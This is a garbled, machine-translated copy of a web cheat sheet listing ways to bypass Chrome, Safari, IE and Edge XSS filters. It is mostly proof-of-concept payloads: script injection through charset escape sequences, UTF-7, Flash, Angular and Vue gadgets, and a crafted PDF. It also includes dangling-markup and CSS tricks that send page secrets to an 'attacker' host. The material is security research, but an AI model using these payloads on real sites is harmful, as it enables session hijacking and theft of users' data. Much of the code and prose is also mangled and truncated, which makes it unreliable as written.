` ` - alert alert ( ( 1 ) < / script script > > < script script > > ` div>
https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
2/20
1/1/2018
Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub
When there is manipulation of a character string When some character strings are deleted or replaced, they can not be blocked by putting the character string in between. When deleted
https://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)% 3E < svg ↓ < svg
o < script > nload = alert (1)> onload = alert (1) >
When it is substituted
https://vulnerabledoma.in/bypass/text?type=7&q=%3Cscript%3E/%26/-alert(1)%3C/script%3E < script > / & / - alert ( 1 ) < / script > ↓ < script > / & amp ; / - alert ( 1 ) < / script >
document.write() DOM based XSS other than request strings https://vulnerabledoma.in/bypass/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)% 3E < body > < script > hash = location . hash . slice ( 1 ); document . body . innerHTML = decodeURIComponent (hash); < / script > body >
https://vulnerabledoma.in/bypass/dom_redirect#javascript: alert (1) < script > location . href = decodeURIComponent ( location . hash . slice ( 1 )); < / script >
XSS in XML page https://vulnerabledoma.in/bypass/xml? q=%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml%22%3Ealert(1)%3C/script%3E xml version = " 1.0 " ?> < html > < script
xmlns = " http://www.w3.org/1999/xhtml " > a
A character string can be described from the top of the page, and Content-Type if it is not specified correctly, bypass is also caused when XML is selected by Content Sniffing. https://vulnerabledoma.in/bypass/text?mime=unknown&q=%3C?xml%20version=%221.0%22? %3E%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml% 22% 3 E alert (1)% 3 C / script% 3 E xml version = " 1.0 " ?> < script
xmlns = " http://www.w3.org/1999/xhtml " > alert (1) <
Those less than this are not able to execute the script, but the description is permitted, and it has the possibility to be used for attack to some extent.
http (s): Create link https://vulnerabledoma.in/bypass/text? q=%3Ca%20href=https://attacker/%3ESession%20expired.%20Please%20login%20again.%3C/a%3 E https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
3/20
1/1/2018 < A
Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub Href = Https: // Attacker .. /> Session Expired Please Login Again A >
A tag that can send requests to the outside In some cases it may be possible to include confidential information in requests such as images by using quotes that do not close one side. https://vulnerabledoma.in/bypass/text?type=8&q=%3Cimg%20src=%22https://attacker/?data= < p > This is a secret text. p>
AAA p> < p > < img
src = " https: //
Describe any CSS In addition to camouflaging the appearance of the page, if confidential information is included on the same page, there is a possibility that information can be acquired using only CSS. See URL for details. Reference URL: http://www.businessinfo.co.uk/labs/talk/The_Sexy_Assassin.ppt http://masatokinugawa.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html https://vulnerabledoma.in/bypass/text? q=%3Cstyle%3E@import%20%27//attacker/test.css%27%3C/style%3E < Style > Attoimport
' //Attacker/test.Css ' Style>
https://vulnerabledoma.in/bypass/text? q=%3Clink%20rel=stylesheet%20href=//attacker/test.css%3E < link
rel = stylesheet
href = //attacker/test.css >
bypass And the use of (Chrome only) Attackable conditions: 1. There is an XSS that can write arbitrary tags 2. Flash is available in target environment Reference URL: http://masatokinugawa.l0.cm/2016/12/xss12.html PoC: https://vulnerabledoma.in/bypass/text? q=%3Cobject%20allowscriptaccess=always%3E%3Cparam%20name=url%20value=https://l0.cm/xs s.swf%3E < object
permissions = always > < param
name = url
value = https://l0.cm/xss.swf >
https://vulnerabledoma.in/bypass/text? q=%3Cobject%20allowscriptaccess=always%3E%3Cparam%20name=code%20value=https://l0.cm/ xss.swf%3E < object
permissions = always > < param
name = code
value = https://l0.cm/xss.swf >
https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
4/20
1/1/2018
Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub
Using the values attribute of SVG animation (Safari only) Attackable conditions: 1. There is an XSS that can write arbitrary tags Reference URL: https://bugs.chromium.org/p/chromium/issues/detail?id=709365 https://bugs.chromium.org/p/chromium/issues/detail?id=738017 PoC: https://vulnerabledoma.in/bypass/text? q=%3Csvg%20xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Canimate%20xlink:href=%23x%20 attributeName=%22xlink : 3 href% 22% 20% = 20% = 20% = 20% = 20% = 20% = 20% = 20% = 20% % 3C / a% 3E < svg
xmlns: xlink = http://www.w3.org/1999/xlink > < animate
xlink: href = # x
attribut
Use of multiple null characters (Safari only) Attackable conditions: 1. There is an XSS that can write arbitrary tags 2. A null byte is output 3. There is no space character immediately before Reference URL: https://twitter.com/0rbz_/status/896896095862669312 PoC: https://vulnerabledoma.in/bypass/text? q=%00%00%00%00%00%00%00%3Cscript%3Ealert(1)%3C/script%3E [0x00] [0x00] [0x00] [0x00] [0x00] [0x00] [0x00] < script > alert ( 1 ) < / script >
Using --> comments in script tag (Safari only) Attackable conditions: 1. There is an XSS that can write arbitrary tags 2. There is a close tag of the script tag without inserting a line feed after it Reference URL: https://bugs.chromium.org/p/chromium/issues/detail?id=753307 PoC: https://vulnerabledoma.in/bypass/text?type=9&q=%3Cscript%3Ealert(1)% 0A--% 3E < div > < script > alert ( 1 ) -> < / div > < script src = / test . js> < / script >
Using an odd base tag (Safari only) Using Flash
Attackable conditions: 1. There is an XSS that can write arbitrary tags https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
5/20
1/1/2018
Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub
2. There is no space character immediately after,
'"
there is after
3. Flash is available in target environment Reference URL: http://masatokinugawa.l0.cm/2016/05/xss8.html PoC: (If there is no space character immediately after) https://vulnerabledoma.in/bypass/text? type=3&q=% 3Combed%20allowscriptaccess= always %20src=/xss.swf%3E%3Cbase%20href=//l0.cm / < div > < embed
allows scriptaccess = always
src = / xss.swf > < base
href = //l0.cm/
(If there is a space character immediately after) https://vulnerabledoma.in/bypass/text? type=4&q=%3Combed%20allowscriptaccess=always%20src=/xss.swf%3E%3Cbase%20href=%22//l 0 .cm/ < div > < embed
allows scriptaccess = always
src = / xss.swf > < base
href = " // l0. cm
Using a script loaded with relative URL
Attackable conditions: 1. There is an XSS that can write arbitrary tags 2. There is no space character immediately after,
'"
there is after
3. After that there is a part loading the script with relative URL PoC: https://vulnerabledoma.in/bypass/text?type=9&q=%3Cbase%20href=//cors.l0.cm/ < div > < base
href = //cors.l0.cm/ div > < script
src = /test.js > script >
Use of ISO-2022-JP escape sequence Attackable conditions: 1. There is an XSS that can write arbitrary tags 2. There is no character code designation on the page Supplement: In the HTML of-2022-ISO JP, [0x1B](B , [0x1B](H , [0x1B](J byte sequence is ignored that. It can be bypassed by sandwiching it between reaction character strings. Also, in Chrome / Safari, the [0x1B]$@[0x0A] byte strings are [0x0A] handled in the same way, but XSS Auditor can n ot interpret well and bypass occurs. Reference URL: https://bugs.chromium.org/p/chromium/issues/detail?id=114941 https://l0.cm/encodings/test3/ PoC: https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022 jp%3E%3Csvg%20o%1B(Bnload=alert(1)%3E https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022 jp%3E%3Csvg%20o%1B(Hnload=alert(1)% 3E https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022 jp%3E%3Csvg%20o%1B(Jnload=alert(1)% 3E https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
6/20
1/1/2018
Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub
< meta
charset = iso - 2022 - jp > < svg
o [ 0 x 1 B ] ( Bnload = alert (1) >
(* Since the $ symbol is arbitrarily encoded and does not move as intended, it has a redirect in a method that includes $) https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022 jp%3E%3Cscript%3Ealert(1)% 1B$@%0A% 3C / script% 3E https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022 jp%3E%3Cscript%3Ealert(1)% 1B$B% 0A% 3C / script% 3E https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022 jp%3E%3Cscript%3Ealert(1)%1B(I%0A%3C/script%3E https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022 jp%3E%3Cscript%3Ealert(1)%1B$@%0D%3C/script%3E < meta
charset = iso-2022-jp > < script > alert ( 1 ) [ 0x1B ] $ @ [ 0x0A ] < / script >
Use link and odd base tag Attackable conditions: 1. There is an XSS that can write arbitrary tags 2. There is a space character immediately after 3.
'"
There is after that
Reference URL: https://bugs.chromium.org/p/chromium/issues/detail?id=719962 PoC: https://vulnerabledoma.in/bypass/text?type=4&q=%3Ca%20href=/**/alert (1)% 3EXSS% 3C / a% 3E% 3Cbase% 20href =% 22 javascript: \ < Div > < A
Href = / ** / Alert (1) > XSS A > < Base
Href = " Javascript: \ Div>
Use of resources of the same domain XSS Auditor does not block loading of resources of the same domain without query. If resources necessary for attack can be placed in the same domain, it is possible to bypass in some cases. Case where XSS is on path (Chrome only)
Attackable conditions: 1. XSS in arbitrary tag can be written in path 2. You do not need a query to display that page PoC: https://vulnerabledoma.in/bypass/path/%3Clink%20rel=import%20href=%22%2Fbypass%2Fpath% 2F%3Cscript%3Ealert(1 )%3C%2Fscript%3E% 22% 3E PATH_INFO: / < link
rel = import
href = " / bypass / path / <script> alert (1) script>
File upload function
Attackable conditions: 1. There is an XSS that can write arbitrary tags 2. Hosting files uploaded by users to the same origin https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
7/20
1/1/2018
Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub
PoC: https://vulnerabledoma.in/bypass/text? q=%3Cscript%20src=/bypass/usercontent/xss.js%3E%3C/script%3E < script
src = /bypass/usercontent/xss.js > script >
(Chrome only) https://vulnerabledoma.in/bypass/text? q=%3Clink%20rel=import%20href=/bypass/usercontent/icon.jpg% 3E < link
rel = import
href = /bypass/usercontent/icon.jpg >
And Flash flashvars use of
Attackable conditions: 1. There is an XSS that can write arbitrary tags 2.
ExnternalInterface.call()
There is Flash that passes parameter strings unprotected to the
same origin 3. Flash is available in target environment Supplement: By using attributes you can pass parameters directly without giving Flash parameters to the query. (= On the F lash side, even if parameter passing from the URL is restricted as a countermeasure against XSS by opening Flash directly flashvars , it can be passed in.) Furthermore, Content-Security-Policy: default-src 'self' when there is a CSP like this, CSP bypass Can also be used. flashvars
PoC: https://vulnerabledoma.in/bypass/text? csp=self&q=%3Cembed%20name=a%20flashvars=%27autoplay=true%26file=%22})\%22)(alert=alert(1))) } catch (e) {} //% 27% 20allowscriptaccess = always% 20src = // vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf%3E < Embed
Name = A
Flashvars = ' Autoplay = True Ando File = "}) \") - (Alert = Alert (1)))
ActionScript: ExternalInterface . Call ( "setTimeout" , ExternalInterface . ObjectID
+
'_event'
+
"(''
Flash of ExternalInterface.objectID the ExternalInterface.call() use of
Attackable conditions: 1. There is an XSS that can write arbitrary tags 2. The same origin ExternalInterface.objectID but which is passed to the
ExternalInterface.call()
there is a Flash,
3. Flash is available in target environment Supplement: Is a property to which the value of the name attribute of the tag used for embedding is set and can not be XSS by itself, but it can be used only for bypass. It ContentSecurity-Policy: default-src 'self' can also be used to bypass the CSP, such as when there is a CSP limit like. ExternalInterface.objectID
PoC:
https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
8/20
1/1/2018
Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub
https://vulnerabledoma.in/bypass/text?csp=self&q=%3Combed%20name=%27alert(1)%27%20allowscriptaccess=always%20src=//vulnerabledoma.in/bypass/wp-includes/js/ mediaelement / flashmediaelement.swf% 3E < embed
name = ' alert (1) - '
allows scriptaccess = always
src = //vulnerabledoma.in/by
ActionScript: ExternalInterface . Call ( ExternalInterface . ObjectID
Tasu
'_Init' ) ;
Using Angular
Attackable conditions: 1. There is an XSS that can write arbitrary tags 2. On the same origin, there is a page hosting Angular or loading Angular from CDN corresponding to CORS Supplement: Angular tries to expand the template enclosed in {{}} in the tag having the attribute ng-app. Templates can execute scripts. Reference URL: http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html PoC: https://vulnerabledoma.in/bypass/text? q=%3Cscript%20src=%22/js/angular1.6.4.min.js%22%3E%3C/script%3E%3Cp%20ng-app%3E { {constructor.constructor (% 27 alert (1)% 27) ()}} < script
src = " /js/angular1.6.4.min.js " > script > < p
ng-app > {{constructor.const
If there is a page loading Angular from CDN corresponding to CORS on the same origin, you can also load resources of external origin by indirectly loading from HTML Imports. (Chrome only) https://vulnerabledoma.in/bypass/text? q=%3Clink%20rel=import%20href=angular.html%3E%3Cp%20ng-app%3E{{constructor.constructor ( %27alert (1 )% 27) ()}} < link
rel = import
href = angular.html > < p
ng-app > {{constructor.constructor ('alert
Use of Vue.js
Attackable conditions: 1. There is an XSS that can write arbitrary tags 2. There is a page that is hosting Vue.js on the same origin or loading from CDN corresponding to CORS 3. There is a script on the page or the same origin that can perform template expansion on specially crafted tags PoC: (This example is for Chrome only) https://vulnerabledoma.in/bypass/text? q=%3Clink%20rel=import%20href=/bypass/vue.html%3E%3Cdiv%20id=app%3E{{constructor. constructor (% 27 alert (1)% 27) ()}} < link
rel = import
href = / bypass / vue.html > < div
id = app > {{constructor.construc
https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
9/20
1/1/2018
Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub
Using jQuery
Attackable conditions: 1. There is an XSS that can write arbitrary tags 2. There is a page loading jQuery from the CDN corresponding to CORS, hosting jQuery on the same origin 3. A script capable of executing jQuery's additional function on a specially crafted form tag exists on that page or on the same origin Supplement: The additional system function of JQuery, after , before , prepend , append , html , replaceWith , wrap , wrapAll , insertBefore , insertAfter , prependTo , appendTo such as thing. ownerDocument By mistaking the reference destination of Node.ownerDocument by using the form part having the name attribute named " DOM Clobbering " (this method is known as DOM Clobbering ) at the scene where original scripts are not executed . Furthermore, there is a process comment section surrounded by is evaluated as a script. PoC: (This example is for Chrome only) https://vulnerabledoma.in/bypass/text?charset=utf8&type=1&q=%3Clink%20rel=import%20href=/bypass/babel-standalone.html%3E%3Csvg%3E % 3Cscript% 20type =% 22text / jsx% 22% 3E //% 3C! -% 0a alert (1) // -% 3E% 3C / svg% 3E% 3Cscript% 3E0% 3C / script% 3E < link rel = import href = /bypass/babel-standalone.html > < svg > < script alert (1) // -> svg> <script> 0 script >
type = text
Use of an odd form tag (information acquisition only) (Safari only) Attackable conditions: 1. There is an XSS that can write arbitrary tags 2. A new form tag can be placed at a position where it can become the destination of the existing form contents including confidential information Reference URL: https://bugs.chromium.org/p/chromium/issues/detail?id=719092 PoC: (If you are in the form) https://vulnerabledoma.in/bypass/form? q=%22%3E%3C/form%3E%3Cform%20action=https://attacker/ < form action = " form " > < input type = " hidden " name = " q " value = " " > form > < form form>
action = https: /
(If you are outside the form) https://vulnerabledoma.in/bypass/form2? q=%3Cbutton%20form=f%3ECLICK%3Cform%20id=f%20action=https://attacker/ < div > < button form = f > CLICK < form < Form Action = " Form2 " >
id = f
action = https: // attacker / div >
https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
11/20
1/1/2018 < input type = " hidden " form >
Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub name = " secret "
value = "a 09 d 3 e f 0 " >
Past bypass Posted at Fixed Bypass Archive .
IE / Edge's XSS filter Those not to be blocked XSS occurring in string literals Supplement: Until then, there was a blocking condition for string literals. Although it remains partly at present location , substitution to obviously attackable which had been blocked until then is permitted, and it is equal to no protection. Since it seems that it does not intend to provide protection anymore, it is classified as not bypassing, not being subject to blocking. https://vulnerabledoma.in/bypass/str_literal?q=%22%3Blocation='javascript \ x3Aalert \ x281 \ x29 '// < script > var q = " " ; location = ' javascript \ x3A alert \ x 28 1 \ x 29 ' // " < / scr
All DOM based XSS https://vulnerabledoma.in/bypass/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)% 3E < script > hash = location . hash . slice ( 1 ); document . write ( decodeURIComponent (hash)); < / script >
https://vulnerabledoma.in/bypass/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)% 3E < body > < script > hash = location . hash . slice ( 1 ); document . body . innerHTML = decodeURIComponent (hash); < / script > body >
https://vulnerabledoma.in/bypass/dom_redirect#javascript: alert (1) < script > location . href = decodeURIComponent ( location . hash . slice ( 1 )); < / script >
XSS with more than one injection point per page https://vulnerabledoma.in/bypass/text? type=2&q=%22src=data:,alert%25281%2529%3E%3C/script%3E%3Cscript%20x=%22 < Div > "Src = Data:, Alert Pasento 281 Pasento 29> Script > < Script X = " Div> " Src = Data:, Alert Pasento 281 Pasento 29 > < / Script > < Script X = " div>
When there is manipulation of a character string https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
12/20
1/1/2018
Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub
When some character strings are deleted or replaced, they can not be blocked by putting the character string in between. When deleted
https://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)% 3E < svg ↓ < svg
o < script > nload = alert (1)> onload = alert (1) >
When it is substituted
The regular expressions of the filter . at the position represented by, determined width can not be shut off when the replacement or more were made. In order
to avoid a match to the blocking condition in the following case, & we use an operation that is over substituted. / Is & a wild card with 0-3 characters, 0-5 characters, so the maximum width that can be blocked is 8 characters. /& The character string length of the output after replacement is 10 characters and it can not be blocked because it exceeds the width of 8 characters. PoC: https://vulnerabledoma.in/bypass/text?type=10&q=%3Cscript/%26%3Ealert(1)%3C/script%3E < script / &> alert (1) script> ↓ <script / & amp;> alert (1) script >
Those less than this are not able to execute the script, but the description is permitted, and it has the possibility to be used for attack to some extent.
A tag that can send requests to the outside In some cases it may be possible to include confidential information in requests such as images by using quotes that do not close one side. https://vulnerabledoma.in/bypass/text?type=8&q=%3Cimg%20src=%22https://attacker/?data= < p > This is a secret text. p> AAA p> < p > < img
src = " https: //
bypass Use of disguised character string in XML namespace (Edge only) Attackable conditions: 1. There is an XSS that can write arbitrary tags 2. Flash is enabled in target environment 3.
X-XSS-Protection:1; mode-block
Header not attached
Supplement: Edge will also try to block tags with XML namespace.
13/20
1/1/2018
Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub
PoC: https://vulnerabledoma.in/bypass/text? q=%3Cembed/:script%20allowscriptaccess=always%20src=//l0.cm/xss.swf%3E < embed /: script
allowing scriptaccess = always
src = //l0.cm/xss.swf >
Use of the escape sequence of HZ-GB-2312 Attackable conditions: 1. There is an XSS that can write arbitrary tags 2.
Content-Type
There is no character code designation in the header
Reference URL: http://masatokinugawa.l0.cm/2015/09/xss7.html PoC: https://vulnerabledoma.in/bypass/text?q=%3Cx~% 0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a < x ~ onfocus = alert (1)
id = a
tabindex = 0 >
Use of encoding behavior during navigation Attackable conditions: 1. There is reflective XSS via GET Supplement: When navigating, IE / Edge sends a request by encoding the query string with the character code of the page before navigation. At this time, the XSS filter was able to cause a discrepancy between (probably) the encoded string and the actually transmitted byte, since it is checking the encoded string itself, not the request being sent In case a bypass occurs. A specific example is shown with the character code x-chinese-cns used in the following PoC. In xchinese- 旡 cns the letter is mapped to 0xA13E. At this time, a query including this character string is <script/旡 transmitted from a page on which x-chinese-cns is set as the character code of the page attached to a parameter having reflection XSS. Then, the transmitted request is 旡 not a representation of UTF-8, but a byte encoded by x-chinese- cns itself (0x3E is > ), and <script> tags are written in the page . Normally if <script> you write a tag, the XSS filter should work, but it will not work here. This reason is presumed to be because the filter sees <script/旡 the character string mistakenly and did not match the blocking condition . Reference URL: http://masatokinugawa.l0.cm/2017/05/xss14.html PoC: https://l0.cm/bypass/ie_x-chinese-cns_text.html < meta charset = utf-8 > < script > document . charset = " x-chinese-cns " ; location = " https://vulnerabledoma.in/bypass/text?q=< script / 旡alert (1) < \ / script < / script >
(In case of XSS with attribute value only) https://l0.cm/bypass/ie_x-chinese-cns_attribute.html
https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
14/20
1/1/2018
Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub
< meta charset = utf-8 > < script > document . charset = " x - chinese cns " ; location = " https://vulnerabledoma.in/bypass/attribute?q= 乜 onmouseover = alert < / script >
Even with other character codes, if you mismatch between the encoded character string and the actually transmitted byte string, you can bypass it. https://l0.cm/bypass/ie_hz_text.html https://l0.cm/bypass/ie_hz_attribute.html https://l0.cm/bypass/ie_iso2022jp_text.html https://l0.cm/bypass/ie_iso2022jp_attribute.html (Although it seems that the operating principle seems to be slightly different from the other vectors, it does not understand the clear principle though it reproduces in the environment of the Japanese locale but it did not reproduce in the German environment. Posted on. https://l0.cm/bypass/ie_0xff_text.html https://l0.cm/bypass/ie_0xff_attribute.html
Using the Adobe Acrobat Reader plug-in (IE only) Attackable conditions: 1. I have an XSS via a POST request 2. The target is using the Adobe Acrobat Reader plug-in Reference URL: http://insert-script.blogspot.com/2017/01/complete-internet-explorer-xss-filter.html PoC: https://l0.cm/bypass/ie_postxss_bypass.pdf %PDF-1.1 1 0 obj << /Type /Catalog /Outlines 2 0 R /Pages 3 0 R /OpenAction 33 0 R /AcroForm 22 0 R >> endobj 2 0 obj << /Type /Outlines /Count 0 >> endobj 3 0 obj << /Type /Pages /Kids [4 0 R] /Count 1 >> endobj 4 0 obj << /Type /Page /Annot [ 23 0 R ] /Parent 3 0 R /MediaBox [0 0 612 792] /Contents 5 0 R /Resources << /ProcSet [/PDF /Text] /Font << /F1 6 0 R >> >>
https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
15/20
1/1/2018
Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub
>> endobj 5 0 obj << /Length 56 >> stream BT /F1 12 Tf 100 700 Td 15 TL (JavaScript example) Tj ET endstream endobj 6 0 obj << /Type /Font /Subtype /Type1 /Name /F1 /BaseFont /Helvetica /Encoding /MacRomanEncoding >> endobj 33 0 obj << /S /SubmitForm /F << % URL TO SUBMIT TO: /F (https://vulnerabledoma.in/bypass/text) /FS /URL >> % SPECIFIES THE FORMAT AND OTHER FORM RELATED CONFIGURATION /Flags 6 >> endobj 22 0 obj << /Fields [23 0 R] >> endobj 23 0 obj << /DA (/Helv 12 Tf 0 g) /F 4 /FT /Tx /Rect [ 9.526760 680.078003 297.527008 702.078003 ] /Subtype /Widget /Type /Annot % PARAMETER NAME /T (q) % PARAMETER PAYLOAD /V (<script>alert\(1\)) /P 4 0 R >> endobj trailer << /Root 1 0 R >>
Use of Content Sniffing in XML (IE only) Attackable conditions: 1. There is an XSS that can write arbitrary tags 2.
X-Content-Type-Options:nosniff
It is not on
3. A character string can be described from the top of the page Reference URL: https://twitter.com/0x6D6172696F/status/753647521050849280 PoC: https://vulnerabledoma.in/bypass/text?q=%3C?xml%20version=%221.0%22? %3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/ xhtml% 22% 3 Elal% 281% 26% 23 x 29% 3 B% 3 C / x: script% 3 E https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
16/20
1/1/2018
Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub
Xml Version = " 1.0 " > X : Script
Xmlns : X = " Http://Www.W3.Org/1999/xhtml " > Ale
UTF-7 BOM usage (IE only) Attackable conditions: 1. A character string can be described from the top of the page 2.
+
,
/
,
-
Description of the symbols are allowed, such as
Supplement: , +/v9 , +/v+ , +/v/ The of-7 UTF BOM are treated as. In IE, when this character string is at the top of the page, the character code of that page is assumed to be UTF - 7. Even if a character code is specified in the page, if you history.back() reopen it via, the character code of that page will be treated as UTF - 7. (Note that the behavior of the latter has already been reported to Microsoft in July 2013, but no change in behavior has been made up to now.) +/v8
PoC: (When character code is not specified on page) https://vulnerabledoma.in/bypass/text?q=%2B/v8%2BADw-script%2BAD4-alert(1)%2BADw-/script%2BAD4+ / v 8 - + ADw - script + AD 4 - alert (1) + ADw - / script + AD 4 -
(When character code is specified on page) https://l0.cm/bypass/ie_utf7.html < script > function go () { window . open ( " https://vulnerabledoma.in/bypass/text?q=%2B/v8-%2BADw-script%2BAD4-alert(
< / script > < button onclick = go () > go button >
Use of (IE only) Attackable conditions: 1. There is a reflective XSS 2. Three or more
<
do not come up to the injection point
3. The document mode of the page is set to 9 or less, the document mode of 9 or less can be set by embedding in the frame etc. Reference URL: http://masatokinugawa.l0.cm/2017/05/xss13.html PoC: https://vulnerabledoma.in/bypass/text?q=%3C? PXML%3E%3Chtml:script%3Ealert(1)%3C/html:script%3E&xuac=9 PXML> < html : script > alert (1) html : script >
https://vulnerabledoma.in/bypass/text? q=%3CPXML%3E%3Chtml:script%3Ealert(1)%3C/html:script%3E&xuac=9 < PXML > < html : script > alert (1) html : script >
Using referrers https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
17/20
1/1/2018
Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub
The XSS filter of IE / Edge does n ot operate the XSS filter in the case where Referer header from the same domain (including subdomain) or localhost is attached. If such a referrer can be attached, it is possible to bypass. Use of the link function in the same domain (including subdomain)
Attackable conditions: 1. There is a reflective XSS 2. You can create links to XSS pages in the same domain (including subdomains) PoC: https://vulnerabledoma.in/bypass/same-domain-link.html https://www.vulnerabledoma.in/bypass/same-domain-link.html < A
Href = " Https://Vulnerabledoma.In/bypass/text?Q=